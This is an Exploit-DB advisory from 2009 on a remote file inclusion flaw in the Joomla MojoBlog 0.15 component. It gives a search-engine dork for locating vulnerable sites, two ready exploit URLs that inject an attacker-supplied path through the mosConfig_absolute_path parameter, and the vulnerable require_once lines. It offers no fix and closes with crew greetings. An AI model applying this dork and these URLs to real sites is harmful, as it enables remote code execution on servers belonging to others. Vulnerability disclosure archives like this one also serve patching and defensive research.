Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusions

EDB-ID:

10273


Author:

kaMtiEz

Type:

webapps


Platform:

PHP

Date:

2009-12-01


#########################################################################
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #
## Author : kaMtiEz (kamzcrew@yahoo.com)  			        #
## Homepage : http://www.indonesiancoder.com    	     		#
## Date : November 20, 2009 						#
#########################################################################

[ Software Information ]

[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] Dork : inurl:"com_mojo"

#########################################################################

[ Vulnerable File ]

http://server/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

http://server/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

[ BUG IN ]

[1] wp-comments-post.php

[2] wp-trackback.php
======================

[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); 

[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); 

[ FIX ]

contact me .. or aurakasih ..

Joke.. ;)
#########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ] 

[+] one day .. u will be mind ..
[+] bangun tidur coba mencari celah .. dapet juga ,, :D
[+] aurakasih .. aku butuh kamuwh .. hha
[+] om tukulesto kapan ke kotaku ?? hha